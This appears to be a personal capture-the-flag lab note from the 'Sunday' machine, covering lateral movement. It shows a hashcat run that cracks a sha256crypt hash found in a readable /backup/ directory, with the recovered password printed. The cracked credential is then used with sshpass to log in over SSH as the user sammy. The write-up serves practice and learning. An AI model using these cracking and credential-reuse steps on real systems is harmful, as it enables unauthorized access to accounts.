InfoSec LAB

Sunday_Lateral_Movement

Created: 2 min read

sammy

Read-able system credential hashes were discovered at the /backup/ directory

Password Cracking

┌──(kali㉿kali)-[~/archive/htb/labs/sunday]
└─$ hashcat -a 0 -m 7400 sammy.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:cooldude!
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 7400 (sha256crypt $5$, SHA256 (Unix))
Hash.Target......: $5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB
Time.Started.....: Sat Jan 21 16:50:37 2023 (2 mins, 58 secs)
Time.Estimated...: Sat Jan 21 16:53:35 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     1145 H/s (7.90ms) @ Accel:64 Loops:256 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 203712/14344385 (1.42%)
Rejected.........: 0/203712 (0.00%)
Restore.Point....: 203520/14344385 (1.42%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4864-5000
Candidate.Engine.: Device Generator
Candidates.#1....: coolster -> circus1
Hardware.Mon.#1..: Util: 85%
 
Started: Sat Jan 21 16:50:22 2023
Stopped: Sat Jan 21 16:53:37 2023

Hashcat cracked the password hash for the sammy user The cracked password is cooldude!

SSH

┌──(kali㉿kali)-[~/archive/htb/labs/sunday]
└─$ sshpass -p 'cooldude!' ssh sammy@$IP -p 22022
warning: 10 failed authentication attempts since last successful authentication.  The latest at Sat Jan 21 14:58 2023.
last login: Wed Apr 13 15:38:02 2022 from 10.10.14.13
Oracle Corporation      SunOS 5.11      11.4    Aug 2018
-bash-4.4$ whoami
sammy
-bash-4.4$ hostname
sunday
-bash-4.4$ ifconfig -a
lo0: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232 index 1
        inet 127.0.0.1 netmask ff000000 
net0: flags=100001000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4,PHYSRUNNING> mtu 1500 index 2
        inet 10.10.10.76 netmask fffffe00 broadcast 10.10.11.255
lo0: flags=2002000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv6,VIRTUAL> mtu 8252 index 1
        inet6 ::1/128 
net0: flags=120002000840<RUNNING,MULTICAST,IPv6,PHYSRUNNING> mtu 1500 index 2
        inet6 ::/0

Lateral Movement to the sammy user via SSH

Interactive Graph View

Backlinks